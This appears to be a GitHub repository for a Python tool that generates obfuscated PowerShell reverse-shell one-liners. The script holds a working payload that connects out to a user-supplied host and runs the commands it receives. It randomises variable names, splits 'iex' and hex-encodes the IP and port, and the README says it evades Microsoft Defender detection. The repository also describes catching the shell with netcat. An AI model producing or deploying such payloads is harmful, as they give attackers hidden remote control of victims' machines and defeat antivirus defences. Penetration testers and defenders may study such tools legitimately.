├── LICENSE ├── PowerShell-Obfuscator.py └── README.md /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 deeexcee-io 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /PowerShell-Obfuscator.py: -------------------------------------------------------------------------------- 1 | import re 2 | import string 3 | import random 4 | 5 | # Accept user input for IP and port 6 | ip = input("Enter IP address: ") 7 | port = input("Enter port: ") 8 | script = "Start-Process $PSHOME\powershell.exe -ArgumentList {-ep bypass -nop $client = New-Object System.Net.Sockets.TCPClient('*LHOST*',*LPORT*);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()} -WindowStyle Hidden" 9 | 10 | # Open script.ps1 file in read mode 11 | #with open(file, 'r') as f: 12 | # script = f.read() 13 | 14 | # Replace all variables with random 10-character names - excluding $PSHOME 15 | var_dict = {} 16 | pattern = re.compile(r'(?!\$PSHOME)(\$[A-Za-z0-9]+)') 17 | 18 | def replace_var(match): 19 | var_name = match.group(1) 20 | if var_name not in var_dict: 21 | var_dict[var_name] = f'${"".join(random.choices(string.ascii_letters + string.digits, k=10))}' 22 | return var_dict[var_name] 23 | 24 | script = pattern.sub(replace_var, script) 25 | 26 | # Replace iex with i''ex 27 | pattern = re.compile(r'iex') 28 | script = pattern.sub("i''ex", script) 29 | 30 | # Replace PS with <:Random uuid):> 31 | pattern = re.compile(r'\bPS\b') 32 | 33 | def replace_ps(match): 34 | return f'<:{"".join(random.choices(string.ascii_letters + string.digits, k=10))}:>' 35 | 36 | script = pattern.sub(replace_ps, script) 37 | 38 | # Replace IP and port in script 39 | script = script.replace("'*LHOST*',*LPORT*", f"'{ip}',{port}") 40 | 41 | # Convert IP addresses to hex 42 | pattern = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b') 43 | 44 | def ip_to_hex(match): 45 | return '0x' + ''.join(f'{int(x):02x}' for x in match.group(0).split('.')) 46 | 47 | script = pattern.sub(ip_to_hex, script) 48 | 49 | # Convert Port Number to hex - Not matching 65535 50 | pattern = re.compile(r'\b(?!65535)([1-9]\d{1,3}|[1-5]\d{4}|6[0-4]\d{3}|65[0-4]\d{2}|655[0-2]\d|6553[0-5])\b') 51 | 52 | def port_to_hex(match): 53 | port_number = int(match.group()) 54 | hex_value = hex(port_number) 55 | return hex_value 56 | 57 | script = pattern.sub(port_to_hex, script) 58 | 59 | # Print modified script to console 60 | print(script) 61 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PowerShell-Reverse-Shell-Generator 2 | Obfuscated, FUD (Defender) Simple PowerShell Reverse Shell One-Liner 3 | 4 | Inspired by https://github.com/t3l3machus. Check out his awesome tools and videos. All credit from this goes to me watching one of his videos. 5 | 6 | # PowerShell-Reverse-Shell-Generator 7 | Obfuscated Reverse Shell Generator - Uses the standard PS one-liner and obfuscates the payload. Unique string each time to evade detection. 8 | 9 | FUD (Fully Undetectable - Defender) @ 11/04/2023 10 | 11 | ## Features 12 | * Generates a PowerShell Reverse Shell one-liner which bypasses Defender. 13 | * Randomly assigns variable names 14 | * IP Address and Port Number are converted to Hex. 15 | * Random ID is given to each Shell Prompt 16 | * Accepts user input for the remote host IP address and port. 17 | 18 | ### Installation 19 | 20 | Clone the repository: 21 | ```bash 22 | git clone https://github.com/deeexcee-io/PowerShell-Reverse-Shell-Generator.git 23 | ``` 24 | 25 | ### Usage 26 | 1. Run the `PowerShell-Obfuscator.py`script 27 | ```bash 28 | python3 PowerShell-Obfuscator.py 29 | ``` 30 | 2. When prompted Enter the IP Address and Port 31 | 3. The script will output the obfuscated PowerShell payload. 32 | 33 | Drop in PowerShell 34 | 35 | ![image](https://user-images.githubusercontent.com/130473605/231182450-104da572-f0d7-4d92-b882-e7a573593dc2.png) 36 | 37 | Setup NC and catch Shell 38 | 39 | ![image](https://user-images.githubusercontent.com/130473605/231182534-31880e1c-a689-48f1-8b15-f75a9afaec76.png) 40 | 41 | 42 | Made with <3 by myself and chatgpt. 43 | 44 | I am not a developer in anyway shape or form. I pentest and use other peoples code/chatgpt. I ask chatgpt questions and it gives me answers. 45 | --------------------------------------------------------------------------------